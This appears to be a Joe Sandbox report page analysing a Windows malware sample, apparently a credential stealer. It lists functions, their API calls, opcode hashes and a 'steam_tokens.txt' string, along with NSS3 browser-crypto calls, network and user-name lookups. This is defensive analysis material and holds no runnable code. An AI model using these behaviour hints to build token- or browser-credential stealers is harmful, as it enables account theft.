Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 82664073c78b14407ff2a65fb01a5e155cda0900eabfa95e0a657889640af93c
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 82664073c78b14407ff2a65fb01a5e155cda0900eabfa95e0a657889640af93c
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04370BC0), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 00a59568e6e8dee021ac523680588fe9d21208a39996b7a3fc61866b91fea596
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: 00a59568e6e8dee021ac523680588fe9d21208a39996b7a3fc61866b91fea596
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04370BC0), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: d60d012d099394867fd0c3f982d7f580b869e45677e5243acd2df46991eb4bfd
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: d60d012d099394867fd0c3f982d7f580b869e45677e5243acd2df46991eb4bfd
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04370BC0), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 55d8cf1ee5e3191f301125c61a170fc330e59dd08e6a8f50685c6e9e78580fbd
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 55d8cf1ee5e3191f301125c61a170fc330e59dd08e6a8f50685c6e9e78580fbd
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,04378AF8), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 1d26accb574f515a2d7fe8c0f6acd20ad4040f4671a96e47e9b6da3715607b39
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: 1d26accb574f515a2d7fe8c0f6acd20ad4040f4671a96e47e9b6da3715607b39
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04370930,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6BBF8A30 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 393memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BBF8A58

Part of subcall function 6BC10FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BBB87ED,00000800,6BBAEF74,00000000), ref: 6BC11000
Part of subcall function 6BC10FF0: PR_NewLock.NSS3(?,00000800,6BBAEF74,00000000), ref: 6BC11016
Part of subcall function 6BC10FF0: PL_InitArenaPool.NSS3(00000000,security,6BBB87ED,00000008,?,00000800,6BBAEF74,00000000), ref: 6BC1102B

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BBF8AC6
PORT_ArenaAlloc_Util.NSS3(00000000,00000044), ref: 6BBF8ADF
SECITEM_CopyItem_Util.NSS3(00000000,00000004,?), ref: 6BBF8B19
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6BBF8B2D
PK11_GenerateRandom.NSS3(00000000,00000010), ref: 6BBF8B49
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000010,00000000), ref: 6BBF8B61
SEC_ASN1EncodeInteger_Util.NSS3(00000000,0000001C), ref: 6BBF8B83
SECOID_SetAlgorithmID_Util.NSS3(00000000,-0000002C,?,00000000), ref: 6BBF8BA0
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BBF8BF0
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6BBF8BF9
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6BBF8C13
HASH_ResultLenByOidTag.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BBF8C3A
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BBF8CA7
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BBF8CC4
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6BBF8D12
PORT_FreeArena_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BBF8D20
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6BBF8D40
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6BBF8D99
PR_SetError.NSS3(FFFFE006,00000000), ref: 6BBF8DBF
PORT_ArenaAlloc_Util.NSS3(00000123,00000018), ref: 6BBF8DD5
SEC_ASN1EncodeItem_Util.NSS3(?,?,00000000,6BCDD864), ref: 6BBF8E39

Part of subcall function 6BC0F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BC0F0C8
Part of subcall function 6BC0F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BC0F122

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,?), ref: 6BBF8E5B

Part of subcall function 6BC0BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6BBBE708,00000000,00000000,00000004,00000000), ref: 6BC0BE6A
Part of subcall function 6BC0BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6BBC04DC,?), ref: 6BC0BE7E
Part of subcall function 6BC0BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6BC0BEC2

SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6BCDD8C4), ref: 6BBF8E94
SECOID_SetAlgorithmID_Util.NSS3(?,00000000,00000000,?), ref: 6BBF8EAC
PORT_ZAlloc_Util.NSS3(00000018), ref: 6BBF8EBA
SECOID_CopyAlgorithmID_Util.NSS3(00000000,00000000,00000000), ref: 6BBF8ECC
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6BBF8EE1
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6BBF8EF4
free.MOZGLUE(00000000), ref: 6BBF8EFD
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6BBF8F11
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6BBF8F1C

Strings

tFVPj, xrefs: 6BBF8EC4

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Arena_Item_$Free$AlgorithmAlloc_ArenaCopyEncodeFindTag_$ErrorZfree$Integer_$GenerateHashInitK11_LockPoolRandomResultTypecallocfree
String ID: tFVPj
API String ID: 2709086113-199373283
Opcode ID: 371e60940e9e70024d47b17e85f548d0acc0c9b57d05999929e3ff4102358131
Instruction ID: 153302a02b06ec841200f6cd5983724350c35c47b2d28f7ad6c1f817d6354531
Opcode Fuzzy Hash: 371e60940e9e70024d47b17e85f548d0acc0c9b57d05999929e3ff4102358131
Instruction Fuzzy Hash: D9D122B5A18280DBE7008F2ADC81B6B77ECEF15344F004969EC54C6191F77DDA5ACAA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC09BB0 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 452stringCOMMON

Download Yara Rule

APIs

